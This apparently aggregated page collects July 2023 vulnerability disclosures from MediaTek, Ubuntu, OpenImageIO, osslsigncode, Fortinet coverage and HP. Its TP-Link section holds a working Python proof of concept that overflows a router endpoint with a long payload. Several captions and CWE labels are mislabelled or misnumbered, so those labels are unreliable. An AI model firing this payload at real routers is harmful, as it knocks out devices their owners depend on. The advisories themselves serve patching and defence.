CVE

**CVE-2023-20692**

Title

Null pointer dereference in wlan

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-476 NULL Pointer Dereference

Description

In wlan firmware, there is possible system crash due to an uncaught exception. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT8167, MT8168, MT8321, MT8365, MT8385, MT8666, MT8765, MT8788

Affected Software Versions

Android 11.0 / IOT-v23.0 (Yocto 4.0)

CVE

**CVE-2023-20693**

Title

Null pointer dereference in wlan

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-477 NULL Pointer Dereference

Description

In wlan firmware, there is possible system crash due to an uncaught exception. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6895, MT6983, MT8167, MT8168, MT8195, MT8321, MT8365, MT8385, MT8666, MT8765, MT8781, MT8788

Affected Software Versions

Android 11.0, 12.0 / IOT-v23.0 (Yocto 4.0)

CVE

**CVE-2022-32666**

Title

User interface (ui) misrepresentation of critical information in Wi-Fi

Severity

Medium

Vulnerability Type

DoS

CWE

CW3-451 User Interface (UI) Misrepresentation of Critical Information

Description

In Wi-Fi, there is a possible low throughput due to misrepresentation of critical information. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7613, MT7615, MT7622, MT7628, MT7629, MT7915, MT7916, MT7981, MT7986, MT8365

Affected Software Versions

7.6.6.0 / IOT-v23.0 (Yocto 4.0)

CVE

**CVE-2023-20748**

Title

Improper input validation in display

Severity

Medium

Vulnerability Type

ID

CWE

CWE-20 Improper Input Validation

Description

In display, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6879, MT6886, MT6895, MT6983, MT6985, MT8673, MT8781

Affected Software Versions

Android 12.0, 13.0

****Vulnerability Type Definition****

Abbreviation

**Definition**

RCE

Remote Code Execution

EoP

Elevation of Privilege

ID

Information Disclosure

DoS

Denial of Service

N/A

Classification not available

****Versions****

**Version**

**Date**

**Description**

1.0

July 3, 2023

Bulletin published.

****Notes****

Information above is generated only at the time of creation of this Security Bulletin. The list of affected chipsets could be not complete. For any further information, device OEMs can reach your MediaTek contact person if needed.

If you want to report a security vulnerability in MediaTek chipsets or products, please go to Report Security Vulnerability page on MediaTek website.

CVE-2023-20775: July 2023

Ubuntu Security Notice 6195-1 - It was discovered that Vim contained an out-of-bounds read vulnerability. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that Vim did not properly manage memory when freeing allocated memory. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that Vim contained a heap-based buffer overflow vulnerability. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6195-1  
July 03, 2023

vim vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in Vim.

Software Description:  
- vim: Vi IMproved - enhanced vi editor

Details:

It was discovered that Vim contained an out-of-bounds read vulnerability.  
An attacker could possibly use this issue to cause a denial of service or  
execute arbitrary code. (CVE-2022-0128)

It was discovered that Vim did not properly manage memory when freeing  
allocated memory. An attacker could possibly use this issue to cause a  
denial of service or execute arbitrary code. (CVE-2022-0156)

It was discovered that Vim contained a heap-based buffer overflow  
vulnerability. An attacker could possibly use this issue to cause a denial  
of service or execute arbitrary code. (CVE-2022-0158)

It was discovered that Vim did not properly manage memory when recording  
and using select mode. An attacker could possibly use this issue to cause  
a denial of service. (CVE-2022-0393)

It was discovered that Vim incorrectly handled certain memory operations  
during a visual block yank. An attacker could possibly use this issue to  
cause a denial of service or execute arbitrary code. (CVE-2022-0407)

It was discovered that Vim contained a NULL pointer dereference  
vulnerability when switching tabpages. An attacker could possible use this  
issue to cause a denial of service. (CVE-2022-0696)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   vim                             2:8.2.3995-1ubuntu2.9  
   vim-athena                      2:8.2.3995-1ubuntu2.9  
   vim-gtk3                        2:8.2.3995-1ubuntu2.9  
   vim-nox                         2:8.2.3995-1ubuntu2.9  
   vim-tiny                        2:8.2.3995-1ubuntu2.9  
   xxd                             2:8.2.3995-1ubuntu2.9

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6195-1  
   CVE-2022-0128, CVE-2022-0156, CVE-2022-0158, CVE-2022-0393,  
   CVE-2022-0407, CVE-2022-0696

Package Information:  
   https://launchpad.net/ubuntu/+source/vim/2:8.2.3995-1ubuntu2.9

Ubuntu Security Notice USN-6195-1

TP-Link TL-WR940N version 4 suffers from a buffer overflow vulnerability.

    # Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow# Date: 2023-06-30# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : hardware# Dork : /userRpm/WanDynamicIpV6CfgRpm# Tested on: Windows/Linux# CVE : CVE-2023-36355import requests# Replace the IP address with the router's IProuter_ip = '192.168.0.1'# Construct the URL with the vulnerable endpoint and parameterurl = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='# Replace the payload with a crafted payload that triggers the buffer overflowpayload = 'A' * 5000  # Example payload, adjust the length as needed# Send the GET request with the crafted payloadresponse = requests.get(url + payload)# Check the response status codeif response.status_code == 200:    print('Buffer overflow triggered successfully')else:    print('Buffer overflow not triggered')

TP-Link TL-WR940N 4 Buffer Overflow

Buffer Overflow vulnerability in OpenImageIO v.2.4.12.0 and before allows a remote to execute arbitrary code and obtain sensitive information via a crafted file to the readimg function.

Describe the bug:  
Hi, I found heap-buffer-overflow in function ICOInput::readimg in file src/ico.imageio/icoinput.cpp

To Reproduce:  
Steps to reproduce the behavior:

1.  CC=afl-clang-fast CXX=afl-clang-fast++ CFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit-frame-pointer" LDFLAGS="-fsanitize=address" cmake .. -DCMAKE\_CXX\_STANDARD=17
2.  make && make install
3.  iconvert poc /tmp/res

poc file:  
poc1.zip

Evidence:  
\==617==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000a602 at pc 0x7f30d95a9823 bp 0x7ffc9cd71f10 sp 0x7ffc9cd71f08  
READ of size 1 at 0x60200000a602 thread T0  
#0 0x7f30d95a9822 in OpenImageIO\_v2\_4::ICOInput::readimg() /root/github/oiio-2.4.11.0\_1/src/ico.imageio/icoinput.cpp:326:36  
#1 0x7f30d95aa6c2 in OpenImageIO\_v2\_4::ICOInput::read\_native\_scanline(int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/ico.imageio/icoinput.cpp:429:14  
#2 0x7f30d90fd4e0 in OpenImageIO\_v2\_4::ImageInput::read\_native\_scanlines(int, int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:399:19  
#3 0x7f30d90fd9c2 in OpenImageIO\_v2\_4::ImageInput::read\_native\_scanlines(int, int, int, int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:420:16  
#4 0x7f30d90fad9e in OpenImageIO\_v2\_4::ImageInput::read\_scanlines(int, int, int, int, int, int, int, OpenImageIO\_v2\_4::TypeDesc, void\*, long, long) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:336:15  
#5 0x7f30d9109c51 in OpenImageIO\_v2\_4::ImageInput::read\_image(int, int, int, int, OpenImageIO\_v2\_4::TypeDesc, void\*, long, long, long, bool (_)(void_, float), void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:967:23  
#6 0x7f30d9197dd7 in OpenImageIO\_v2\_4::ImageOutput::copy\_image(OpenImageIO\_v2\_4::ImageInput\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageoutput.cpp:588:19  
#7 0x5620dac9426c in convert\_file(std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&) /root/github/oiio-2.4.11.0\_1/src/iconvert/iconvert.cpp:449:27  
#8 0x5620dac99221 in main /root/github/oiio-2.4.11.0\_1/src/iconvert/iconvert.cpp:523:14  
#9 0x7f30d6b32d8f (/lib/x86\_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)  
#10 0x7f30d6b32e3f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)  
#11 0x5620dabd1054 in \_start (/root/github/oiio-2.4.11.0\_1/dist/bin/iconvert+0x28054) (BuildId: dee6af2e834643e5fa1ac02b9cc829ac746f39a2)

0x60200000a602 is located 10 bytes to the right of 8-byte region \[0x60200000a5f0,0x60200000a5f8)  
allocated by thread T0 here:  
#0 0x5620dac8ec6d in operator new(unsigned long) (/root/github/oiio-2.4.11.0\_1/dist/bin/iconvert+0xe5c6d) (BuildId: dee6af2e834643e5fa1ac02b9cc829ac746f39a2)  
#1 0x7f30d95a7924 in \_\_gnu\_cxx::new\_allocator::allocate(unsigned long, void const\*) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/ext/new\_allocator.h:127:27  
#2 0x7f30d95a7924 in std::allocator\_traits<std::allocator >::allocate(std::allocator&, unsigned long) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/bits/alloc\_traits.h:464:20  
#3 0x7f30d95a7924 in std::\_Vector\_base<unsigned char, std::allocator >::\_M\_allocate(unsigned long) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/bits/stl\_vector.h:346:20  
#4 0x7f30d95a7924 in std::\_Vector\_base<unsigned char, std::allocator >::\_M\_create\_storage(unsigned long) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/bits/stl\_vector.h:361:33  
#5 0x7f30d95a7924 in std::\_Vector\_base<unsigned char, std::allocator >::\_Vector\_base(unsigned long, std::allocator const&) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/bits/stl\_vector.h:305:9  
#6 0x7f30d95a7924 in std::vector<unsigned char, std::allocator >::vector(unsigned long, std::allocator const&) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/bits/stl\_vector.h:511:9  
#7 0x7f30d95a7924 in OpenImageIO\_v2\_4::ICOInput::readimg() /root/github/oiio-2.4.11.0\_1/src/ico.imageio/icoinput.cpp:308:32  
#8 0x7f30d95aa6c2 in OpenImageIO\_v2\_4::ICOInput::read\_native\_scanline(int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/ico.imageio/icoinput.cpp:429:14  
#9 0x7f30d90fd4e0 in OpenImageIO\_v2\_4::ImageInput::read\_native\_scanlines(int, int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:399:19  
#10 0x7f30d90fd9c2 in OpenImageIO\_v2\_4::ImageInput::read\_native\_scanlines(int, int, int, int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:420:16  
#11 0x7f30d90fad9e in OpenImageIO\_v2\_4::ImageInput::read\_scanlines(int, int, int, int, int, int, int, OpenImageIO\_v2\_4::TypeDesc, void\*, long, long) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:336:15  
#12 0x7f30d9109c51 in OpenImageIO\_v2\_4::ImageInput::read\_image(int, int, int, int, OpenImageIO\_v2\_4::TypeDesc, void\*, long, long, long, bool (_)(void_, float), void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:967:23  
#13 0x7f30d9197dd7 in OpenImageIO\_v2\_4::ImageOutput::copy\_image(OpenImageIO\_v2\_4::ImageInput\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageoutput.cpp:588:19  
#14 0x5620dac9426c in convert\_file(std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&) /root/github/oiio-2.4.11.0\_1/src/iconvert/iconvert.cpp:449:27  
#15 0x5620dac99221 in main /root/github/oiio-2.4.11.0\_1/src/iconvert/iconvert.cpp:523:14  
#16 0x7f30d6b32d8f (/lib/x86\_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/github/oiio-2.4.11.0\_1/src/ico.imageio/icoinput.cpp:326:36 in OpenImageIO\_v2\_4::ICOInput::readimg()  
Shadow bytes around the buggy address:  
0x0c047fff9470: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd  
0x0c047fff9480: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd  
0x0c047fff9490: fa fa fd fd fa fa fd fa fa fa 02 fa fa fa 00 07  
0x0c047fff94a0: fa fa 00 fa fa fa 00 fa fa fa fd fa fa fa fd fa  
0x0c047fff94b0: fa fa fd fa fa fa fd fa fa fa 00 00 fa fa 00 fa  
\=>0x0c047fff94c0:\[fa\]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff94d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff94e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff94f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff9500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff9510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
Left alloca redzone: ca  
Right alloca redzone: cb  
\==617==ABORTING

Platform information:  
OIIO branch/version: 2.4.12  
OS: Linux  
C++ compiler: clang-14.0.6

CVE-2023-36183: [BUG] Heap-buffer-overflow in function ICOInput::readimg in file src/ico.imageio/icoinput.cpp · Issue #3871 · OpenImageIO/oiio

Buffer Overflow vulnerability in mtrojnar osslsigncode v.2.3 and before allows a local attacker to execute arbitrary code via a crafted .exe, .sys, and .dll files.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

*   Notifications
*   Fork 112

*   Code
*   Issues 7
*   Pull requests 2
*   Actions
*   Projects
*   Security
*   Insights

Permalink

**Comparing changes**

Choose two branches to see what’s changed or to start a new pull request. If you need to, you can also .

**Open a pull request**

Create a new pull request by comparing changes across two branches. If you need to, you can also .

_base repository:_ mtrojnar/osslsigncode _base:_ 2.2

_head repository:_ mtrojnar/osslsigncode _compare:_ 2.3

CVE-2023-36377: Comparing 2.2...2.3 · mtrojnar/osslsigncode

Some 340,000 FortiGate SSL VPN appliances remain exposed to the threat more than three weeks after Fortinet released firmware updates to address the issue.

Researchers have written exploit code for a critical remote code execution (RCE) vulnerability in Fortinet's FortiGate SSL VPNs that the vendor disclosed and patched in June 2023.

Bishop Fox's research team, which developed the exploit, has estimated there are some 340,000 affected FortiGate devices that are currently unpatched against the flaw and remain open to attack. That number is significantly higher than the 250,000 FortiGate devices that several researchers estimated were vulnerable to exploit when Fortinet first disclosed the flaw on June 12.

**Code Not Released Publicly — but There's a GIF**

"There are 490,000 affected \[FortiGate\] SSL VPN interfaces exposed on the internet, and roughly 69% of them are currently unpatched," Bishop Fox's director of capability development, Caleb Gross, wrote in a blog post on June 30. "You should patch yours now."

The heap-based buffer overflow vulnerability, tracked as CVE-2023-27997, affects multiple versions of FortiOS and FortiProxy SSL-VPN software. It gives an unauthenticated, remote attacker a way to execute arbitrary code on an affected device and take complete control of it. Researchers from French cybersecurity firm Lexfo who discovered the flaw assessed it as affecting every single SSL VPN appliance running FortiOS.

Bishop Fox has not released its exploit code publicly. But its blog post has a GIF of it in use. Gross described the exploit that Bishop Fox has developed as giving attackers a way to open an interactive shell they could use to communicate with an affected FortiGate appliance.

"This exploit very closely follows the steps detailed in the original blog post by Lexfo, though we had to take a few extra steps that were not mentioned in that post," Gross wrote. "The exploit runs in approximately one second, which is significantly faster than the demo video on a 64-bit device shown by Lexfo."

Fortinet issued firmware updates that addressed the issue on June 12. At the time, the company said the flaw affected organizations in government, manufacturing and other critical infrastructure sectors. Fortinet said it was aware of an attacker exploiting the vulnerability in a limited number of cases.

Fortinet cautioned about the potential for threat actors like those behind the Volt Typhoon cyber-espionage campaign to abuse CVE-2023-27997. Volt Typhoon is a China-based group that is believed to have established persistent access on networks belonging to US telecom companies and other critical infrastructure organizations, for stealing sensitive data and carrying out other malicious actions. The campaign so far has primarily used another, older Fortinet flaw (CVE-2022-40684) for initial access. But organizations should not discount the possibility of Volt Typhoon — and other threat actors — using CVE-2023-27997 either, Fortinet warned.

**Why Security Appliances Make Popular Targets**

CVE-2023-27997 is one of numerous critical Fortinet vulnerabilities that have been exposed. Like that of almost every other firewall and VPN vendor, Fortinet's appliances are a popular target for adversaries because of the access they provide to enterprise networks.

The US Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and others have issued multiple advisories in recent years about the need for organizations to promptly address vulnerabilities in these and other network devices because of the high attacker interest in them.

In June 2022, for instance, CISA warned of China-sponsored threat actors actively targeting unpatched vulnerabilities in network devices from a wide range of vendors. The advisory included a list of the most common of these vulnerabilities. The list included vulnerabilities in products from Fortinet, Cisco, Citrix, Netgear, Pulse, QNAP, and Zyxel.

Systems administrators should patch as quickly as possible, even though patching firmware can be a bit more cumbersome when dealing with appliances that run application gateways, says Timothy Morris, chief security adviser at Tanium. Often, appliances such as those from Fortinet face the perimeter and have very high-availability requirements, meaning they have tight windows for change.

"For most organizations, a certain amount of downtime is probably inevitable," Morris says. Vulnerabilities such as CVE-2023-27997 require the full firmware image to be reloaded, so there is a certain amount of time and risk involved, he adds. "Configurations have to be backed up and restored to make sure they are working as expected."

Researchers Develop Exploit Code for Critical Fortinet VPN Bug

Certain HP LaserJet Pro print products are potentially vulnerable to Buffer Overflow and/or Denial of Service when using the backup & restore feature through the embedded web service on the device.

**hp-concentra-wrapper-portlet**

 Actions

Certain HP LaserJet Pro print products are potentially vulnerable to Buffer Overflow and/or Denial of Service when using the backup & restore feature through the embedded web service on the device.

Severity

High

HP Reference

HPSBPI03852 rev.01

Release date

June 22, 2023

Last updated

June 22, 2023

Category

Print

Potential Security Impact

Potential Buffer Overflow, Denial of Service

**Relevant Common Vulnerabilities and Exposures (CVE) List**

**Reported by:** hoangha2 (ZDI-CAN-19693)

List of CVE IDs    

CVE ID

CVSS

Severity

Vector

CVE-2023-35176

8.8

High

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Learn more about CVSS 3.0 base metrics, which range from 0 to 10.

PSR-2023-0059

**Resolution**

Update the printer firmware.

HP has provided an updated firmware resolution for potentially affected products listed in the table below. To obtain the updated firmware, go to the HP Customer Support - Software and Driver Downloads, and then search for your printer model.

**Affected LaserJet Pro printers**

Find the products affected and the firmware version that resolves the vulnerabilities.

Affected products    

Product Name

Product Number

Updated Firmware Version

HP Color LaserJet MFP M478-M479 series

W1A75A, W1A76A, W1A77A, W1A81A, W1A82A, W1A79A, W1A80A, W1A78A

002\_2322C or higher

HP Color LaserJet Pro M453-M454 series

W1Y40A, W1Y41A, W1Y46A, W1Y47A, W1Y44A, W1Y45A, W1Y43A

002\_2322C or higher

HP LaserJet Pro M304-M305 Printer series

W1A66A, W1A46A, W1A47A, W1A48A

002\_2322C or higher

HP LaserJet Pro M404-M405 Printer series

W1A51A, W1A53A, W1A56A, W1A63A, W1A52A, 93M22A, W1A58A, W1A59A, W1A60A, W1A57A

002\_2322C or higher

HP LaserJet Pro MFP M428-M429 f series

W1A29A, W1A32A, W1A30A, W1A38A, W1A34A, W1A35A

002\_2322C or higher

HP LaserJet Pro MFP M428-M429 series

W1A28A, W1A31A, W1A33A

002\_2322C or higher

**Revision history**

This document has been revised according to the information below.

List of versions   

Version

Description

Date

1

Initial Release

June 22, 2023

**Additional information**

Follow these links for additional information.

Third-party security patches

Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support

For issues about implementing the recommendations of this Security Bulletin, visit http://www.hp.com/go/contacthp to learn about your HP support options.

Report

To report a potential security vulnerability with any HP supported product, send email to: hp-security-alert@hp.com.

Subscribe

To initiate a subscription to receive future HP Security Bulletin alerts via email, visit https://h41369.www4.hp.com/alerts-signup.php?lang=en&cc=US&jumpid=hpsc\_profile.

Security bulletin archive

To view released Security Bulletins, visit https://support.hp.com/security-bulletins.

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.

Download HP’s security-alert PGP key

**Legal information**

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Security Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

© Copyright 2023 HP Development Company, L.P.

HP Inc. (HP) shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. "HP Inc.," "HP" and the names of HP products referenced herein are trademarks of HP Inc. or its affiliates in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

Tag

#buffer_overflow